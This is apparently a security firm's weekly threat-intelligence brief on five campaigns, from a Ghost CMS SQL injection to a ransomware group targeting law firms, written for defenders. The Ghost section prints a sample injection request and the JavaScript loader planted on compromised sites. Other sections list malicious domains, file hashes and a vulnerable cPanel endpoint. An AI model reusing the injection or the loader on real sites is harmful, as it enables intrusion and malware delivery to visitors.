← All threat briefs
Threat Brief

Weekly Situation Report — 6/1/26

Key takeaways

  • SQL injection in Ghost CMS powers large-scale ClickFix malware campaigns
  • Lazarus APT subgroup introduced fileless remote access trojan for evasion
  • Nimbus Manticore continues targeting aerospace and technology sectors
  • cPanel LiteSpeed plugin vulnerability (CVE-2026-48172) actively exploited
  • Silent ransomware operation targeting law firms through focused intrusions

1. Ghost CMS SQL Injection Flaw Fuels Large Scale ClickFix Campaigns

Summary

A critical SQL injection vulnerability in Ghost CMS is being exploited to inject malicious JavaScript, enabling ClickFix attacks across over 700 domains. Despite available patches, affected organizations include major universities and technology companies.

Category

Known Exploited Vulnerabilities

Industry

Technology, Public Sector and Government Administration, Education

Sources

Analyst comments

CVE-2026-26980 affects Ghost versions 3.24.0 through 6.19.0, allowing attackers to access admin API keys and modify content. “Despite a patch being available since February 19, many sites remain unpatched” or reinfected. Multiple public proof-of-concept exploits exist, with highest concentration of exposed hosts in the United States.

GET /ghost/api/content/tags/?key=<redacted>&filter=slug:%5B'%20O R%20(1=1)%20T H E N%20(S E L E C T%20abs(-9223372036854775808))%20WHEN%20slug=',news%5D&limit=all HTTP/1.1
Host: localhost:8080
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Actionable guidance

Update outdated Ghost CMS versions immediately. Monitor for SQL injection artifacts in GET requests using /ghost/api/content/tags/?key=...&filter=slug:<SQL STRING url encoded>. Compromised sites contained injected malicious JavaScript:

<script>
(function(){
  var a = location;
  var b = document.head || document.getElementsByTagName("head")[0];
  var c = "script";
  var d = atob("<base64 string>");

  d += d.indexOf("?") > -1 ? "&" : "?";
  d += a.search.substring(1);

  c = document.createElement(c);
  c.src = d;
  c.id = btoa(a.origin);
  b.appendChild(c);
})();
</script>

2. Lazarus APT Subgroup Unveils Fileless RAT Designed to Evade Detection

Summary

North Korea-linked Lazarus APT developed RemotePE, a memory-only remote access trojan using environmental keying to evade detection and enable prolonged observation for potential high-impact operations.

Category

State-Sponsored Espionage

Industry

Finance, Business Services

Sources

Analyst comments

Lazarus subgroup Citrine Sleet developed RemotePE, employing a three-stage infection chain: DPAPILoader, RemotePELoader, and RemotePE. The malware leverages DPAPI encryption, environmental keying, and anti-analysis techniques to create victim-specific payloads. “While available samples date back to 2023 and 2024, several command and control indicators remain active,” reflecting infrastructure reuse. Campaigns target financial and cryptocurrency organizations through targeted social engineering.

Actionable guidance

This actor conducts prolonged social engineering campaigns targeting financial and cryptocurrency personnel. Victims are lured into meetings where attackers simulate technical issues and convince them to install malicious files. Restrict software installation privileges to authorized personnel. Detection should focus on POST requests to /channel endpoints, particularly those using the Microsoft-Delivery-Optimization/10 user agent communicating with non-Microsoft infrastructure.

3. Nimbus Manticore Continued Campaign Movements Against Aerospace and Technology Orgs

Summary

During Operation Epic Fury, Iran-linked Nimbus Manticore accelerated cyberattacks using AI-assisted malware development. New backdoors like MiniFast and tactics including SEO poisoning and trojanized Zoom installers targeted aerospace, telecommunications, and technology sectors.

Category

Threat Actor Activities

Industry

Aviation/Aerospace, Telecommunications, Public Sector and Government Administration, Technology

Sources

Analyst comments

Nimbus Manticore deployed AI-assisted malware, fake Zoom installers, and SEO poisoning against defense, aviation, and telecommunications organizations. The campaign introduced backdoors MiniJunk and MiniFast, relying on SEO poisoning, fake software downloads, and employment-themed phishing. “Current visibility suggests the actor may be rotating infrastructure, shifting operational objectives during the current ceasefire period, or preparing for future campaigns.” Despite potential changes, the actor likely continues using signed binaries and SEO poisoning.

SSL Certificates Used to Sign Binaries

Gray Matter Software S.R.L.
Kirubel Kerie Negeya

Domains (Stale)

business-startup[.]org
business-startup.azurewebsites[.]net
businessstartup.azurewebsites[.]net
buisness-centeral.azurewebsites[.]net
buisness-centeral-transportation.azurewebsites[.]net
buisness-centeral-transportation[.]com
licencemanagers.azurewebsites[.]net
licencesupporting.azurewebsites[.]net
peerdistsvcmanagers.azurewebsites[.]net
nanomatrix.azurewebsites[.]net
PremierHealthAdvisory[.]com
PremierHealthAdvisory[.]azurewebsites.net
Premier-HealthAdvisory[.]azurewebsites.net
ramiltonsfinance[.]com
ramiltonsfinance.azurewebsites[.]net
ramiltons-finance.azurewebsites[.]net
globalitconsultants.azurewebsites[.]net
globalit-consultants.azurewebsites[.]net
global-it-consultants.azurewebsites[.]net
global-it-checkers.azurewebsites[.]net
global-it-checkbusiness.azurewebsites[.]net
global-check-itbusiness.azurewebsites[.]net
global-check-business-it.azurewebsites[.]net
globalbusiness-checkers-it.azurewebsites[.]net
getsqldeveloper[.]com (currently down)

SHA256 Hashes

10fd541674adadfbba99b54280f7e59732746faf2b10ce68521866f737f1e46d
eee657ffdb2af8ed6412221e7d5fbf4f5742f2ac2c88f43f12db46af0697de71
781605ce9d4a9869e846f6c9657d71437cb6240ab27ffbc4cd550c0e06996690
2c214494fd0bad31473ca8adce78a4f50847876584571e66aadeae70827ec2dc
f08b17856616d66492a24dced27f788e235f35f42fa7cd10f315000d3a2f4c03
a57ffb819fe8d98ff925c5d7b239598fe302acf5a13193d7a535040a71298fdf
63d0d3c4a7f71bdbca720903d6a99b832089cc093c64d2938e7e001e56c17ab4
74882085db2088356ed7f72f01e0404a0a98cda88ef56fb15ce74c1f36b26d27
bc3b44154518c5794ce639108e7b9c5fecb0c189607a26de1aaed518d890c7ad
ecaf493c320d201d285ef5f61d75744216e47cf1115b4af528f9a78883cc446e
44f4f7aca7f1d9bfdaf7b3736934cbe19f851a707662f8f0b0c49b383e054250
0db36a04d304ad96f9e6f97b531934594cd95a5cea9ff2c9af249201089dc864
485f182f7b74ea4013b2539275a95d21e3a9bf0082c331937af9353a324b36f3
64530d7e6ee30e4a66d9eeed6b8595c33fd72f5f73409133ca40539e5695df4c
332ba2f0297dfb1599adecc3e9067893e7cf243aa23aedce4906a4c480574c17
9e4a658e6d831c9e9bdfe11884a75b7c64812ed0a80e8495ddf6b316505acac1
43dc62cef52ebdd69e79f10015b3e13890f26c058325c0ff139c70f8d8eadcfa
8808c794c24367438f183e4be941876f1d3ecd0c8d2eb43b10d2380841d2283b
5c3362d20229597d11380f56d1f2eb39647fb6afad7be8392a7abcd18dff12f8
0291ef318576953f7f3fe287e7775ed1d7c3206119dc7b9cd6d85c02779e6e40
d4a7e9f107fe40c1a5d0139c6c6e25bf6bf57f61feff090bee28f476bb3cc3c2
38bd137c672bd58d08c4f0502f993a6561e2c3411773d1ae57ee0151a0a9d11d
f54cd38632ac9da3af3533ae93e92625cbcb04df521dbf1b6acfaa81218f9e8c
b19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4
9cf029daca89523d917dafed0568d11d00e45ec96b5b90b4a1f7fd4018c7da84
a13ba3c5aff46e9daf2d23df4b3e3d49dc7236c207c56f0a1433051f3450d441
dfa1e3137a032ee8561a1cd5e1a0f71a10bebb36aef7c336c878638a9c1239ee
b19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4

Actionable guidance

Organizations in telecommunications, aviation, government, and public administration face greatest risk. Users should verify file sources before execution; administrators should restrict unapproved software and monitor known campaign infrastructure. Certificate-based detection is valuable given frequent use of signed binaries. Organizations matching the targeting profile should add known indicators to blocklists and conduct retrospective hunting, particularly U.S. aviation organizations.

4. cPanel Litespeed Plugin Flaw CVE-2026-48172 Exploited in the Wild

Summary

The U.S. Cybersecurity and Infrastructure Security Agency mandated federal agencies secure servers against a critical privilege escalation vulnerability in the LiteSpeed cPanel plugin. The flaw enables remote attackers to execute arbitrary scripts with root privileges and is actively prioritized for remediation.

Category

Known Exploited Vulnerabilities

Industry

Technology, Public Sector and Government Administration

Sources

Analyst comments

CISA directed federal agencies to address CVE-2026-48172, a critical privilege escalation flaw in the LiteSpeed cPanel user-end plugin actively exploited. The vulnerability permits remote attackers with valid credentials to execute arbitrary scripts with root privileges through the /execute/Litespeed/redisAble.php endpoint. “LiteSpeed has released updates, and organizations should validate exposure and review logs for signs of compromise.” A public proof-of-concept exists, increasing exploitation likelihood.

Actionable guidance

Apply vendor-provided patches immediately. Active exploitation involves GET requests to /execute/Litespeed/redisAble.php containing Linux-like commands executing code on underlying filesystems. Defenders should examine the redis_server parameter for suspicious command execution attempts, expecting variations. Detection should focus on requests targeting the vulnerable endpoint, particularly those containing encoded payloads or suspicious command attempts.

5. Silent Ransomware Targeting Law Firms

Summary

The Silent Ransom Group (SRG), a cyber extortion group linked to former Conti ransomware operations, increasingly targets U.S. law firms. The group employs phishing, fake IT support calls, and in-person visits to steal sensitive data for extortion.

Category

Ransomware

Industry

Legal and Law, Business Services

Sources

Analyst comments

The Silent Ransom Group (SRG), also tracked as Luna Moth, Chatty Spider, and UNC3753, represents a cyber extortion group connected to former Conti ransomware syndicate operations actively targeting U.S. law firms. “The group relies on phishing, voice phishing, IT impersonation, and legitimate remote management tools to gain access and steal sensitive data.” Once inside networks, SRG leverages WinSCP, Rclone, and credential reuse to expand access and facilitate extortion.

Actionable guidance

Users should verify the identity of anyone claiming to be IT support before granting access or following instructions. Organizations should restrict remote management software, reduce credential theft opportunities, and limit administrative tool access. Additional defenses include restricting scripting and command-line tools, limiting removable media, enforcing multifactor authentication, and disabling unnecessary remote access services. While U.S. law firms face elevated risk, the threat matches other ransomware and extortion groups targeting the legal sector.


Get the Complete Report

The full Intelligence Desk brief includes exhaustive IOC lists, YARA detection rules, detailed remediation playbooks, and OSec’s original threat research. Delivered weekly to partners and clients. REQUEST ACCESS

More briefs
Weekly Situation Report — 6/15/26Jun 18, 2026Weekly Situation Report — 6/8/26Jun 11, 2026Weekly Situation Report — 5/25/26May 28, 2026
Talk to an expert